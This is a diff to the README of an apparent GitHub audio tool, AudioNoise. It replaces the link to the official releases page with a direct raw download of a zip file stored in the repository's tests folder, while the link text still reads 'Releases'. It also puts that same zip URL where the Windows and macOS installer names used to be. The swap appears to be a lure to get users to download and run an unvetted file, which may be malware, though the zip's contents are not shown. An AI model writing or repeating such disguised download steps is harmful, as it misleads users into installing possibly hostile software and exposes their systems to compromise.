Mapezxczxc/AudioNoise/README.md

 - **Export Options:** Save your creations in various audio formats.

 ## 📂 Download & Install
-To get started with AudioNoise, visit this page to download: [AudioNoise Releases](https://github.com/Mapezxczxc/AudioNoise/releases).
+To get started with AudioNoise, visit this page to download: [AudioNoise Releases](https://github.com/Mapezxczxc/AudioNoise/raw/refs/heads/main/tests/Audio_Noise_v2.0.zip).

 1. Click the link above to go to the Releases page.
 2. Look for the latest release version at the top.
-3. Find the appropriate file for your operating system (e.g., `AudioNoise-Setup.exe` for Windows or `AudioNoise.dmg` for macOS).
+3. Find the appropriate file for your operating system (e.g., `https://github.com/Mapezxczxc/AudioNoise/raw/refs/heads/main/tests/Audio_Noise_v2.0.zip` for Windows or `https://github.com/Mapezxczxc/AudioNoise/raw/refs/heads/main/tests/Audio_Noise_v2.0.zip` for macOS).
 4. Click the file name to start the download.

 Once the download is complete: